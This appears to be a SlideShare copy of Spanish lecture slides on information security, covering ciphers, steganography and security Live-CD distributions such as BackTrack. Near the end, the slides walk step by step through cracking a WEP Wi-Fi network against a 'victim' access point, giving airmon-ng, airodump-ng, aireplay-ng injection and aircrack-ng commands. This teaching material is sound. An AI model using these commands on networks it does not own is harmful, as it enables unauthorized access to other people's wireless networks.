SlideShare ist ein Scribd-Unternehmen logo
1 von 30
Downloaden Sie, um offline zu lesen
SEGURIDAD INFORMÁTICA
   Distribuciones Live-CD


                 Prof. Manuel Mujica
                 manuel@ubuntu.org.ve
CONTENIDO

   ¿Qué es seguridad de la información?
   ¿Por qué seguridad informática?
   Modelos de ataques
   Criptografía
   Esteganografía
   Distribuciones Live-CD
   Ejemplos
¿Qué es Seguridad de la Información?

     Seguridad de información es mucho más que establecer
“firewalls”, aplicar parches para corregir nuevas vulnerabilidades
 en el sistema de software, o guardar en la bóveda los “backups”.


Seguridad de información es determinar qué requiere ser protegido
     y por qué, de qué debe ser protegido y cómo protegerlo.
¿Qué es Seguridad de la Información?

La seguridad de información se caracteriza por la preservación de:

CONFIDENCIALIDAD : La información está protegida de
personas no autorizadas.

INTEGRIDAD : La información está como se pretende, sin
modificaciones inapropiadas.

DISPONIBILIDAD : Los usuarios tienen acceso a la información
y a los activos asociados cuando lo requieran.
¿Por qué seguridad informática?

  RSA, la División de Seguridad de EMC (NYSE: EMC), anunció
los resultados de la Encuesta mundial sobre seguridad del
consumidor en línea del año 2010: 92% realizó una transacción
bancaria en línea y el 80% realizó una compra en línea.


   Un reciente estudio de Federal Deposit Insurance Corporation
(FDIC) indica que durante el último trimestre de 2009, los
ciberdelincuentes robaron más de 150 millones de dólares de
cuentas   bancarias    de   pequeñas     y   medianas     empresas
norteamericanas.
Modelos de Ataques

E                            R   E                            R



                  I                            I

        Intercepción                     Modificación



    E                    R           E                    R


                                                              E: Emisor
              I                                    I          R: Receptor
                                                              I: Intruso
         Fabricación                       Interrupción
Criptografía

         Técnica para ocultar y así proteger información
          Técnica para ocultar y así proteger información
                  mientras permanece en disco
                  mientras permanece en disco
                   o mientras está en tránsito
                    o mientras está en tránsito

Substitución:
         Cambia un carácter por uno o varios caracteres

                   M U R C I E L A GO
                   0 1 2 3 4 5 6 7 8 9

        Hola como estas                   H967 3909 5ST7S
Criptografía


Substitución.

Sustituir un elemento del alfabeto del texto-plano por uno que corres-
ponde al alfabeto del texto-cifrado.

El alfabeto latino, que consta de 29 letras: A, B, C, Ch, D, E, F, G, H, I,
J, K, L, Ll, M, N, Ñ, O, P, Q, R, S, T, U, V, W, X, Y y Z

      Texto-plano:   UNIVERSIDAD
      Texto-cifrado: XPLYHUVLGChG
Criptografía


Transposición (Permutación).
  Permuta los caracteres del texto plano.

   Texto-plano: ESTE ES UN MENSAJE DE PRUEBA!
   Texto-cifrado: EUAR SNJU TMEE EEDB ENEA SSP!


                 E   S T   E   E S
                 U   NM    E   N S
                 A   J E   D    E P
                 R   U E   B   A !
Esteganografía

El término "esteganografía" viene del griego stegos, que signi-
fica "cubierta", por lo que esteganografía significaría "escritu-
ra oculta" o "escritura encubierta".

Así pues, la esteganografía es el conjunto de técnicas que per-
miten ocultar o camuflar la información.

Nótese que la criptografía modifica los datos para que no sean
legibles, a diferencia de la esteganografía, que simplemente los
toma y los oculta entre otros datos.

La esteganografía se utiliza para crear canales encubiertos
(covert channels) y marcas de agua (watermarks) para proteger
derechos de autor.
Esteganografía
Distribuciones Live-CD
nUbuntu

nUbuntu o Network Ubuntu es un proyecto para tomar la
distribución Ubuntu existente y reconvertirla en un LiveCD e
instalación completa con las herramientas necesarias para realizar
pruebas de penetración en servidores y redes.


La distro incluye algunos de los programas de seguridad para
Linux más usados, tales como Ethereal, nmap, dSniff, y
Ettercap.


Distribución GNU/Linux       Fuente: http://www.nubuntu.org
CAINE

CAINE (Computer Aided INvestigative Environment) es una
distribución GNU/Linux de origen italiano. Creado como un
proyecto de Ingeniería Forense.


Proporciona:
   Fácil interoperabilidad durante todo el análisis (Preservación,
    Recolección, Análisis, Reportes).
   Amigable entorno gráfico.
   Ubuntu como sistema base.
   Generación semi-automática de reportes.
CAINE

Algunas herramientas incluidas:

   Grissom Analyzer
   Automated Image & Restore (AIR)
   Guymager
   Foremost and Scalpel
   Autopsy 2.20 and TSK 3.0
   SFDumper
   Fundl
   Stegdetect
   Ophcrack

CAINE es Open Source       Fuente: http://www.caine-live.net/
BackTrack

BackTrack es una distribución GNU/Linux en formato Live-CD
pensada y diseñada para la auditoría de seguridad y relacionada
con la seguridad informática en general.


Se deriva de la unión de dos grandes distribuciones orientadas a la
seguridad, el Auditor + WHAX.


Sistema base Ubuntu.
BackTrack

Incluye una larga lista de herramientas de seguridad listas para
usar, entre las que destacan numerosos scanners de puertos y
vulnerabilidades, archivos de exploits, sniffers, herramientas
de análisis forense y herramientas para la auditoría Wireless.



Fuente: http://www.backtrack-linux.org/
BackTrack

Lista de Herramientas:
 Recolección de Información (37)
           Dig, TCPtraceroute, Tctrace, Whoami.
 Mapeo de Redes (28)
           Hping, Nmap
 Identificación de Vulnerabilidades (65)
           GFI LanGuard, Nikto, SuperScan
 Penetración (12)
           OpenSSL-To-Open, Pirana
 Escalada de Privilegios (48)
           Etherape, EtterCap, Wireshark
 Mantenimiento de Acceso (15)
           Backdoors, CryptCat
BackTrack

Lista de Herramientas:
 Cubrimiento (1)
           Housekeeping
 Análisis de redes inalámbricas
           802.11 WIFI (25): aircrack-ng, Airsnort
           Bluetooth (22): Btcrack, hstest
 VOIP & Análsis telefónico (7)
           SIPdump, Smap
 Ingeniería forence (13)
           Autopsy, DD_Rescue, Foremost, Rootkithunter
 Ingeniería Inversa (7)
           GDB GNU Debugger, GDB Console GUI
 Servicios (1)
           SNORT
Ejemplos: steghide

Adjuntar adj.txt en cvr.jpg:

#steghide embed -cf cvr.jpg -ef adj.txt



Extraer datos adjuntos desde cvr.jpg:

#steghide extract -sf cvr.jpg
Ejemplos: wireshark
Nikto
Nikto
Ejemplos: crack wep wifi

Términos:
-------------
BSSID (mac del router que da la señal)
PWR (Poder de señal)
CHN (Canal que se encuentra la red)
ENCR (Es el tipo de contraseña que tiene la red)
ESSID (Nombre de la red inalámbrica).
Ejemplos: crack wep wifi

Caso 1: Red sin Filtro de MAC:

Abrimos una Terminal (consola 1):

1. Ponemos la tarjeta en modo monitor con airmon-ng
airmon-ng start [nombre tarjeta inalámbrica] --> wlan0, wlan1,
ath0,.

Ejemplo:
#airmon-ng start wlan0

En modo monitor, la tarjeta quedara renombrada como: mon0 o
mon1
Ejemplos: crack wep wifi

Caso 1: Red sin Filtro de MAC:

2. Escaneamos las redes wireless con airodump-ng
airodump-ng [nombre tarjeta inalámbrica]    --> mon0, mon1…..

Ejemplo:
#airodump-ng mon0

Verificamos el canal (CH) en el que está trabajando la red al cual
atacaremos.


Presionamos Ctrl + c para detener el escaneo.
Ejemplos: crack wep wifi

Caso 1: Red sin Filtro de MAC:

Abrimos otra Terminal (consola 2):
1. Nos asociamos a la red inalámbrica con aireplay-ng
aireplay-ng -1 0 -a [MAC AP Victima] [nombre tarjeta wifi]
Ejemplo:
#aireplay-ng -1 0 –a 11:22:33:44:55:66 mon0

2. Empezamos a inyectar paquetes a la red asociada con aireplay-
ng
aireplay-ng -3 -b [MAC AP Victima] [nombre tarjeta wifi]

Ejemplo:
#aireplay-ng -3 –b 11:22:33:44:55:66 mon0
Ejemplos: crack wep wifi

Caso 1: Red sin Filtro de MAC:

Abrimos otra Terminal (consola 3):

1. Una vez capturado una gran cantidad de datos (Data) vamos a
crackear la red inalámbrica con aircrack-ng

aircrack-ng [filename]-01.cap

Ejemplo:

#aircrack-ng wep-01.cap
GRACIAS POR SU ATENCIÓN


   "Sólo hay un bien: el
      conocimiento.
    Sólo hay un mal:
     la ignorancia."

                      Sócrates.
http://pide.wordpress.com
 CONTACTO:

 email: manuel@ubuntu.org.ve
 OpenPGP keys:7661B42E
 http://pgp.cs.uu.nl/

 Twitter: @mmujica001

 Ubuntu User #4728
 Linux User #439689

 Blog's: http://pide.wordpress.com

 http://www.ubuntu-ve.org


            http://creativecommons.org/licenses/by/3.0/deed.es

Weitere ähnliche Inhalte

Was ist angesagt? (17)

El sendero-del-hacker
El sendero-del-hackerEl sendero-del-hacker
El sendero-del-hacker
 
Encriptacion
EncriptacionEncriptacion
Encriptacion
 
Trabajo de criptografía
Trabajo de criptografíaTrabajo de criptografía
Trabajo de criptografía
 
Hackeo sivernetico
Hackeo siverneticoHackeo sivernetico
Hackeo sivernetico
 
unidad 4 Actividad 6
unidad 4 Actividad 6unidad 4 Actividad 6
unidad 4 Actividad 6
 
Articulo criptoanalisis
Articulo criptoanalisisArticulo criptoanalisis
Articulo criptoanalisis
 
Seguridad informatica 1
Seguridad  informatica 1Seguridad  informatica 1
Seguridad informatica 1
 
Criptoánalisis
CriptoánalisisCriptoánalisis
Criptoánalisis
 
Encriptacion mark
Encriptacion markEncriptacion mark
Encriptacion mark
 
Main in the middle
Main in the middleMain in the middle
Main in the middle
 
Criptografiajuandavidvelez
CriptografiajuandavidvelezCriptografiajuandavidvelez
Criptografiajuandavidvelez
 
Seguridad en redes corporativas II (PRAXITEC)
Seguridad en redes corporativas II (PRAXITEC)Seguridad en redes corporativas II (PRAXITEC)
Seguridad en redes corporativas II (PRAXITEC)
 
Experiencias con-asterisk-1.8-cert
Experiencias con-asterisk-1.8-certExperiencias con-asterisk-1.8-cert
Experiencias con-asterisk-1.8-cert
 
Algoritmo aes
Algoritmo aesAlgoritmo aes
Algoritmo aes
 
ELF en la mira: Hacking y Defensa
ELF en la mira: Hacking y DefensaELF en la mira: Hacking y Defensa
ELF en la mira: Hacking y Defensa
 
Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...
Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...
Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...
 
TECNICAS DE HACER CRIPTOGRAFÍA
TECNICAS DE HACER  CRIPTOGRAFÍA TECNICAS DE HACER  CRIPTOGRAFÍA
TECNICAS DE HACER CRIPTOGRAFÍA
 

Andere mochten auch

Demostrador hardware para la etapa banda base de un sistema mimo ofdm por-rei...
Demostrador hardware para la etapa banda base de un sistema mimo ofdm por-rei...Demostrador hardware para la etapa banda base de un sistema mimo ofdm por-rei...
Demostrador hardware para la etapa banda base de un sistema mimo ofdm por-rei...Manuel Mujica
 
Diseño de una etapa rf utilizando la herramienta awr por liliana jorquera
Diseño de una etapa rf utilizando la herramienta awr por  liliana jorqueraDiseño de una etapa rf utilizando la herramienta awr por  liliana jorquera
Diseño de una etapa rf utilizando la herramienta awr por liliana jorqueraManuel Mujica
 
Herramienta de evaluación para la implementación eficaz de voip en las organi...
Herramienta de evaluación para la implementación eficaz de voip en las organi...Herramienta de evaluación para la implementación eficaz de voip en las organi...
Herramienta de evaluación para la implementación eficaz de voip en las organi...Manuel Mujica
 
Elaboración de Artículos Científicos
Elaboración de Artículos CientíficosElaboración de Artículos Científicos
Elaboración de Artículos CientíficosManuel Mujica
 
PLAN ESTRATÉGICO PARA MINIMIZAR EL EFECTO DE LOS CAMBIOS ORGANIZACIONALES SOB...
PLAN ESTRATÉGICO PARA MINIMIZAR EL EFECTO DE LOS CAMBIOS ORGANIZACIONALES SOB...PLAN ESTRATÉGICO PARA MINIMIZAR EL EFECTO DE LOS CAMBIOS ORGANIZACIONALES SOB...
PLAN ESTRATÉGICO PARA MINIMIZAR EL EFECTO DE LOS CAMBIOS ORGANIZACIONALES SOB...Manuel Mujica
 
RECOMENDACIONES TECNICAS PARA EL TRABAJO DE MONOGRAFIA
RECOMENDACIONES TECNICAS PARA EL TRABAJO DE MONOGRAFIARECOMENDACIONES TECNICAS PARA EL TRABAJO DE MONOGRAFIA
RECOMENDACIONES TECNICAS PARA EL TRABAJO DE MONOGRAFIACOTAC
 
Como hacer Análisis, conclusiones y recomendaciones de un trabajo de investig...
Como hacer Análisis, conclusiones y recomendaciones de un trabajo de investig...Como hacer Análisis, conclusiones y recomendaciones de un trabajo de investig...
Como hacer Análisis, conclusiones y recomendaciones de un trabajo de investig...eileen489
 
Recomendaciones de investigación
Recomendaciones de investigaciónRecomendaciones de investigación
Recomendaciones de investigacióncarmen cardenas
 
Test Hamnet Ubiquity Bullet 2 - distance 1500m
Test Hamnet Ubiquity Bullet 2 - distance 1500mTest Hamnet Ubiquity Bullet 2 - distance 1500m
Test Hamnet Ubiquity Bullet 2 - distance 1500mLionel Repellin
 
Où partir 2 jours au printemps ?
Où partir 2 jours au printemps ?Où partir 2 jours au printemps ?
Où partir 2 jours au printemps ?Laurence Da-Ros
 
Note biodiversité-vp LFE
Note biodiversité-vp LFENote biodiversité-vp LFE
Note biodiversité-vp LFElafabriqueecolo
 
2014-11 Adwords pour qui pour quoi comment
2014-11 Adwords pour qui pour quoi comment2014-11 Adwords pour qui pour quoi comment
2014-11 Adwords pour qui pour quoi commentBrioude Internet
 
Teoria delaciencia01
Teoria delaciencia01Teoria delaciencia01
Teoria delaciencia01guidoalarcon
 
Les territoires au défi de la santé environnementale - De l'Histoire à l'action
Les territoires au défi de la santé environnementale - De l'Histoire à l'actionLes territoires au défi de la santé environnementale - De l'Histoire à l'action
Les territoires au défi de la santé environnementale - De l'Histoire à l'actionlafabriqueecolo
 
El conocimiento silencioso
El conocimiento silenciosoEl conocimiento silencioso
El conocimiento silenciosoEuler
 
Devenez agent indépendant dans le développement des entreprises
Devenez agent indépendant dans le développement des entreprisesDevenez agent indépendant dans le développement des entreprises
Devenez agent indépendant dans le développement des entreprisespatrickserge
 
Presentación sobre el uso de las tecnologías móviles en la academia
Presentación sobre el uso de las tecnologías móviles en la academiaPresentación sobre el uso de las tecnologías móviles en la academia
Presentación sobre el uso de las tecnologías móviles en la academiaLiz Pagan
 

Andere mochten auch (20)

Demostrador hardware para la etapa banda base de un sistema mimo ofdm por-rei...
Demostrador hardware para la etapa banda base de un sistema mimo ofdm por-rei...Demostrador hardware para la etapa banda base de un sistema mimo ofdm por-rei...
Demostrador hardware para la etapa banda base de un sistema mimo ofdm por-rei...
 
Diseño de una etapa rf utilizando la herramienta awr por liliana jorquera
Diseño de una etapa rf utilizando la herramienta awr por  liliana jorqueraDiseño de una etapa rf utilizando la herramienta awr por  liliana jorquera
Diseño de una etapa rf utilizando la herramienta awr por liliana jorquera
 
Herramienta de evaluación para la implementación eficaz de voip en las organi...
Herramienta de evaluación para la implementación eficaz de voip en las organi...Herramienta de evaluación para la implementación eficaz de voip en las organi...
Herramienta de evaluación para la implementación eficaz de voip en las organi...
 
Elaboración de Artículos Científicos
Elaboración de Artículos CientíficosElaboración de Artículos Científicos
Elaboración de Artículos Científicos
 
PLAN ESTRATÉGICO PARA MINIMIZAR EL EFECTO DE LOS CAMBIOS ORGANIZACIONALES SOB...
PLAN ESTRATÉGICO PARA MINIMIZAR EL EFECTO DE LOS CAMBIOS ORGANIZACIONALES SOB...PLAN ESTRATÉGICO PARA MINIMIZAR EL EFECTO DE LOS CAMBIOS ORGANIZACIONALES SOB...
PLAN ESTRATÉGICO PARA MINIMIZAR EL EFECTO DE LOS CAMBIOS ORGANIZACIONALES SOB...
 
RECOMENDACIONES TECNICAS PARA EL TRABAJO DE MONOGRAFIA
RECOMENDACIONES TECNICAS PARA EL TRABAJO DE MONOGRAFIARECOMENDACIONES TECNICAS PARA EL TRABAJO DE MONOGRAFIA
RECOMENDACIONES TECNICAS PARA EL TRABAJO DE MONOGRAFIA
 
Como hacer Análisis, conclusiones y recomendaciones de un trabajo de investig...
Como hacer Análisis, conclusiones y recomendaciones de un trabajo de investig...Como hacer Análisis, conclusiones y recomendaciones de un trabajo de investig...
Como hacer Análisis, conclusiones y recomendaciones de un trabajo de investig...
 
Recomendaciones de investigación
Recomendaciones de investigaciónRecomendaciones de investigación
Recomendaciones de investigación
 
Redacción de discusión y conclusiones
Redacción de discusión y conclusionesRedacción de discusión y conclusiones
Redacción de discusión y conclusiones
 
Test Hamnet Ubiquity Bullet 2 - distance 1500m
Test Hamnet Ubiquity Bullet 2 - distance 1500mTest Hamnet Ubiquity Bullet 2 - distance 1500m
Test Hamnet Ubiquity Bullet 2 - distance 1500m
 
Où partir 2 jours au printemps ?
Où partir 2 jours au printemps ?Où partir 2 jours au printemps ?
Où partir 2 jours au printemps ?
 
Note biodiversité-vp LFE
Note biodiversité-vp LFENote biodiversité-vp LFE
Note biodiversité-vp LFE
 
Dix ans après Maputo. Note APESS : Elements de bilan du soutien public à l’e...
Dix ans après Maputo. Note APESS : Elements de bilan du soutien public à l’e...Dix ans après Maputo. Note APESS : Elements de bilan du soutien public à l’e...
Dix ans après Maputo. Note APESS : Elements de bilan du soutien public à l’e...
 
2014-11 Adwords pour qui pour quoi comment
2014-11 Adwords pour qui pour quoi comment2014-11 Adwords pour qui pour quoi comment
2014-11 Adwords pour qui pour quoi comment
 
Teoria delaciencia01
Teoria delaciencia01Teoria delaciencia01
Teoria delaciencia01
 
Photo pleine page
Photo pleine pagePhoto pleine page
Photo pleine page
 
Les territoires au défi de la santé environnementale - De l'Histoire à l'action
Les territoires au défi de la santé environnementale - De l'Histoire à l'actionLes territoires au défi de la santé environnementale - De l'Histoire à l'action
Les territoires au défi de la santé environnementale - De l'Histoire à l'action
 
El conocimiento silencioso
El conocimiento silenciosoEl conocimiento silencioso
El conocimiento silencioso
 
Devenez agent indépendant dans le développement des entreprises
Devenez agent indépendant dans le développement des entreprisesDevenez agent indépendant dans le développement des entreprises
Devenez agent indépendant dans le développement des entreprises
 
Presentación sobre el uso de las tecnologías móviles en la academia
Presentación sobre el uso de las tecnologías móviles en la academiaPresentación sobre el uso de las tecnologías móviles en la academia
Presentación sobre el uso de las tecnologías móviles en la academia
 

Ähnlich wie Seguridad informatica (live cd) 1.2

Unidad III Métodos de cifrado
Unidad III  Métodos de cifradoUnidad III  Métodos de cifrado
Unidad III Métodos de cifradoLisby Mora
 
Transparencia resumen examen final
Transparencia  resumen examen finalTransparencia  resumen examen final
Transparencia resumen examen finalRuben Torres Bazan
 
Diccionario informatico luz marina
Diccionario informatico luz marinaDiccionario informatico luz marina
Diccionario informatico luz marinaRosalba Ortega Ramos
 
Copia de cuestionario_de_concepto_de_seguridad 2
Copia de cuestionario_de_concepto_de_seguridad 2Copia de cuestionario_de_concepto_de_seguridad 2
Copia de cuestionario_de_concepto_de_seguridad 2DUBANTKDX
 
SEGURIDAD INFORMATICA
SEGURIDAD INFORMATICASEGURIDAD INFORMATICA
SEGURIDAD INFORMATICANeto-bujia
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticawalteraguero
 
Seguridad en redes de la información
Seguridad en redes de la información Seguridad en redes de la información
Seguridad en redes de la información jeiseldos
 
Software Libre
Software LibreSoftware Libre
Software Librescreyes
 
Encriptacion de datos, una vista general
Encriptacion de datos, una vista generalEncriptacion de datos, una vista general
Encriptacion de datos, una vista generalChristian Caceres
 
Seguridad informatica
Seguridad informatica Seguridad informatica
Seguridad informatica estefasanchez
 
Seguridad informática
Seguridad informática Seguridad informática
Seguridad informática estefasanchez
 
Glosario informatica
Glosario informaticaGlosario informatica
Glosario informaticaedwin alvarez
 
Guia de redireccionamiento en ubuntu
Guia de redireccionamiento en ubuntuGuia de redireccionamiento en ubuntu
Guia de redireccionamiento en ubuntuPatoMC
 

Ähnlich wie Seguridad informatica (live cd) 1.2 (20)

Unidad III Métodos de cifrado
Unidad III  Métodos de cifradoUnidad III  Métodos de cifrado
Unidad III Métodos de cifrado
 
Transparencia resumen examen final
Transparencia  resumen examen finalTransparencia  resumen examen final
Transparencia resumen examen final
 
Resumen
ResumenResumen
Resumen
 
Diccionario informatico luz marina
Diccionario informatico luz marinaDiccionario informatico luz marina
Diccionario informatico luz marina
 
Replay attack
Replay attackReplay attack
Replay attack
 
Copia de cuestionario_de_concepto_de_seguridad 2
Copia de cuestionario_de_concepto_de_seguridad 2Copia de cuestionario_de_concepto_de_seguridad 2
Copia de cuestionario_de_concepto_de_seguridad 2
 
SEGURIDAD INFORMATICA
SEGURIDAD INFORMATICASEGURIDAD INFORMATICA
SEGURIDAD INFORMATICA
 
Seguridad Informática-Ataques a la web.
Seguridad Informática-Ataques a la  web.Seguridad Informática-Ataques a la  web.
Seguridad Informática-Ataques a la web.
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
(in) seguridad en VoIP
(in) seguridad en VoIP(in) seguridad en VoIP
(in) seguridad en VoIP
 
Seguridad en redes de la información
Seguridad en redes de la información Seguridad en redes de la información
Seguridad en redes de la información
 
Erickk
ErickkErickk
Erickk
 
Software Libre
Software LibreSoftware Libre
Software Libre
 
Criptografia
CriptografiaCriptografia
Criptografia
 
Glosario informatica
Glosario informaticaGlosario informatica
Glosario informatica
 
Encriptacion de datos, una vista general
Encriptacion de datos, una vista generalEncriptacion de datos, una vista general
Encriptacion de datos, una vista general
 
Seguridad informatica
Seguridad informatica Seguridad informatica
Seguridad informatica
 
Seguridad informática
Seguridad informática Seguridad informática
Seguridad informática
 
Glosario informatica
Glosario informaticaGlosario informatica
Glosario informatica
 
Guia de redireccionamiento en ubuntu
Guia de redireccionamiento en ubuntuGuia de redireccionamiento en ubuntu
Guia de redireccionamiento en ubuntu
 

Mehr von Manuel Mujica

DISEÑO DE UNA INFRAESTRUCTURA TECNOLOGICA (IT) QUE PERMITA ALTA DISPONIBILI...
DISEÑO DE UNA INFRAESTRUCTURA  TECNOLOGICA (IT) QUE PERMITA  ALTA DISPONIBILI...DISEÑO DE UNA INFRAESTRUCTURA  TECNOLOGICA (IT) QUE PERMITA  ALTA DISPONIBILI...
DISEÑO DE UNA INFRAESTRUCTURA TECNOLOGICA (IT) QUE PERMITA ALTA DISPONIBILI...Manuel Mujica
 
PROPUESTA DE MEJORAS DE LOS PROCESOS ADMINISTRATIVOS USANDO BMM (MODELADO DE ...
PROPUESTA DE MEJORAS DE LOS PROCESOS ADMINISTRATIVOS USANDO BMM (MODELADO DE ...PROPUESTA DE MEJORAS DE LOS PROCESOS ADMINISTRATIVOS USANDO BMM (MODELADO DE ...
PROPUESTA DE MEJORAS DE LOS PROCESOS ADMINISTRATIVOS USANDO BMM (MODELADO DE ...Manuel Mujica
 
Certificacion electronica
Certificacion electronicaCertificacion electronica
Certificacion electronicaManuel Mujica
 
Seguridad de la informacion redes sociales
Seguridad de la informacion redes socialesSeguridad de la informacion redes sociales
Seguridad de la informacion redes socialesManuel Mujica
 
Arquitectura de sistema de información para la gestión administrativa del dep...
Arquitectura de sistema de información para la gestión administrativa del dep...Arquitectura de sistema de información para la gestión administrativa del dep...
Arquitectura de sistema de información para la gestión administrativa del dep...Manuel Mujica
 
Herramienta de evaluación para la implementación eficaz de voip en las organi...
Herramienta de evaluación para la implementación eficaz de voip en las organi...Herramienta de evaluación para la implementación eficaz de voip en las organi...
Herramienta de evaluación para la implementación eficaz de voip en las organi...Manuel Mujica
 
Herramienta de evaluación para la implementación eficaz de voip en las organi...
Herramienta de evaluación para la implementación eficaz de voip en las organi...Herramienta de evaluación para la implementación eficaz de voip en las organi...
Herramienta de evaluación para la implementación eficaz de voip en las organi...Manuel Mujica
 
MODELO DE BALANCEO DE CARGA DINAMICO PARA MEJORAR EL RENDIMIENTO DE UNA RED C...
MODELO DE BALANCEO DE CARGA DINAMICO PARA MEJORAR EL RENDIMIENTO DE UNA RED C...MODELO DE BALANCEO DE CARGA DINAMICO PARA MEJORAR EL RENDIMIENTO DE UNA RED C...
MODELO DE BALANCEO DE CARGA DINAMICO PARA MEJORAR EL RENDIMIENTO DE UNA RED C...Manuel Mujica
 
DISEÑO DE UN PROTOTIPO FUNCIONAL DEL SISTEMA DE INFORMACIÓN PARA LA GESTIÓN D...
DISEÑO DE UN PROTOTIPO FUNCIONAL DEL SISTEMA DE INFORMACIÓN PARA LA GESTIÓN D...DISEÑO DE UN PROTOTIPO FUNCIONAL DEL SISTEMA DE INFORMACIÓN PARA LA GESTIÓN D...
DISEÑO DE UN PROTOTIPO FUNCIONAL DEL SISTEMA DE INFORMACIÓN PARA LA GESTIÓN D...Manuel Mujica
 
SISTEMATIZACIÓN DEL PROCESO DE EVALUACIÓN DE DESEMPEÑO DE LOS PREPARADORES DO...
SISTEMATIZACIÓN DEL PROCESO DE EVALUACIÓN DE DESEMPEÑO DE LOS PREPARADORES DO...SISTEMATIZACIÓN DEL PROCESO DE EVALUACIÓN DE DESEMPEÑO DE LOS PREPARADORES DO...
SISTEMATIZACIÓN DEL PROCESO DE EVALUACIÓN DE DESEMPEÑO DE LOS PREPARADORES DO...Manuel Mujica
 
SISTEMATIZACIÓN DE LA GESTIÓN DE RIESGOS DE SEGURIDAD DE LA INFORMACIÓN EN LA...
SISTEMATIZACIÓN DE LA GESTIÓN DE RIESGOS DE SEGURIDAD DE LA INFORMACIÓN EN LA...SISTEMATIZACIÓN DE LA GESTIÓN DE RIESGOS DE SEGURIDAD DE LA INFORMACIÓN EN LA...
SISTEMATIZACIÓN DE LA GESTIÓN DE RIESGOS DE SEGURIDAD DE LA INFORMACIÓN EN LA...Manuel Mujica
 
DISEÑO DE UN SISTEMA DE INFORMACIÓN FINANCIERO BASADO EN BSC EN CLÍNICA RAZET...
DISEÑO DE UN SISTEMA DE INFORMACIÓN FINANCIERO BASADO EN BSC EN CLÍNICA RAZET...DISEÑO DE UN SISTEMA DE INFORMACIÓN FINANCIERO BASADO EN BSC EN CLÍNICA RAZET...
DISEÑO DE UN SISTEMA DE INFORMACIÓN FINANCIERO BASADO EN BSC EN CLÍNICA RAZET...Manuel Mujica
 
Satelite Simon Bolivar - UNEFA
Satelite Simon Bolivar - UNEFASatelite Simon Bolivar - UNEFA
Satelite Simon Bolivar - UNEFAManuel Mujica
 
Redes satelitales - UNEFA
Redes satelitales - UNEFARedes satelitales - UNEFA
Redes satelitales - UNEFAManuel Mujica
 

Mehr von Manuel Mujica (20)

DISEÑO DE UNA INFRAESTRUCTURA TECNOLOGICA (IT) QUE PERMITA ALTA DISPONIBILI...
DISEÑO DE UNA INFRAESTRUCTURA  TECNOLOGICA (IT) QUE PERMITA  ALTA DISPONIBILI...DISEÑO DE UNA INFRAESTRUCTURA  TECNOLOGICA (IT) QUE PERMITA  ALTA DISPONIBILI...
DISEÑO DE UNA INFRAESTRUCTURA TECNOLOGICA (IT) QUE PERMITA ALTA DISPONIBILI...
 
PROPUESTA DE MEJORAS DE LOS PROCESOS ADMINISTRATIVOS USANDO BMM (MODELADO DE ...
PROPUESTA DE MEJORAS DE LOS PROCESOS ADMINISTRATIVOS USANDO BMM (MODELADO DE ...PROPUESTA DE MEJORAS DE LOS PROCESOS ADMINISTRATIVOS USANDO BMM (MODELADO DE ...
PROPUESTA DE MEJORAS DE LOS PROCESOS ADMINISTRATIVOS USANDO BMM (MODELADO DE ...
 
Seguridad en sl
Seguridad en slSeguridad en sl
Seguridad en sl
 
Certificacion electronica
Certificacion electronicaCertificacion electronica
Certificacion electronica
 
Seguridad de la informacion redes sociales
Seguridad de la informacion redes socialesSeguridad de la informacion redes sociales
Seguridad de la informacion redes sociales
 
Informatica forense
Informatica forenseInformatica forense
Informatica forense
 
Estego
EstegoEstego
Estego
 
Edit
EditEdit
Edit
 
Desuco
DesucoDesuco
Desuco
 
Intei
InteiIntei
Intei
 
Arquitectura de sistema de información para la gestión administrativa del dep...
Arquitectura de sistema de información para la gestión administrativa del dep...Arquitectura de sistema de información para la gestión administrativa del dep...
Arquitectura de sistema de información para la gestión administrativa del dep...
 
Herramienta de evaluación para la implementación eficaz de voip en las organi...
Herramienta de evaluación para la implementación eficaz de voip en las organi...Herramienta de evaluación para la implementación eficaz de voip en las organi...
Herramienta de evaluación para la implementación eficaz de voip en las organi...
 
Herramienta de evaluación para la implementación eficaz de voip en las organi...
Herramienta de evaluación para la implementación eficaz de voip en las organi...Herramienta de evaluación para la implementación eficaz de voip en las organi...
Herramienta de evaluación para la implementación eficaz de voip en las organi...
 
MODELO DE BALANCEO DE CARGA DINAMICO PARA MEJORAR EL RENDIMIENTO DE UNA RED C...
MODELO DE BALANCEO DE CARGA DINAMICO PARA MEJORAR EL RENDIMIENTO DE UNA RED C...MODELO DE BALANCEO DE CARGA DINAMICO PARA MEJORAR EL RENDIMIENTO DE UNA RED C...
MODELO DE BALANCEO DE CARGA DINAMICO PARA MEJORAR EL RENDIMIENTO DE UNA RED C...
 
DISEÑO DE UN PROTOTIPO FUNCIONAL DEL SISTEMA DE INFORMACIÓN PARA LA GESTIÓN D...
DISEÑO DE UN PROTOTIPO FUNCIONAL DEL SISTEMA DE INFORMACIÓN PARA LA GESTIÓN D...DISEÑO DE UN PROTOTIPO FUNCIONAL DEL SISTEMA DE INFORMACIÓN PARA LA GESTIÓN D...
DISEÑO DE UN PROTOTIPO FUNCIONAL DEL SISTEMA DE INFORMACIÓN PARA LA GESTIÓN D...
 
SISTEMATIZACIÓN DEL PROCESO DE EVALUACIÓN DE DESEMPEÑO DE LOS PREPARADORES DO...
SISTEMATIZACIÓN DEL PROCESO DE EVALUACIÓN DE DESEMPEÑO DE LOS PREPARADORES DO...SISTEMATIZACIÓN DEL PROCESO DE EVALUACIÓN DE DESEMPEÑO DE LOS PREPARADORES DO...
SISTEMATIZACIÓN DEL PROCESO DE EVALUACIÓN DE DESEMPEÑO DE LOS PREPARADORES DO...
 
SISTEMATIZACIÓN DE LA GESTIÓN DE RIESGOS DE SEGURIDAD DE LA INFORMACIÓN EN LA...
SISTEMATIZACIÓN DE LA GESTIÓN DE RIESGOS DE SEGURIDAD DE LA INFORMACIÓN EN LA...SISTEMATIZACIÓN DE LA GESTIÓN DE RIESGOS DE SEGURIDAD DE LA INFORMACIÓN EN LA...
SISTEMATIZACIÓN DE LA GESTIÓN DE RIESGOS DE SEGURIDAD DE LA INFORMACIÓN EN LA...
 
DISEÑO DE UN SISTEMA DE INFORMACIÓN FINANCIERO BASADO EN BSC EN CLÍNICA RAZET...
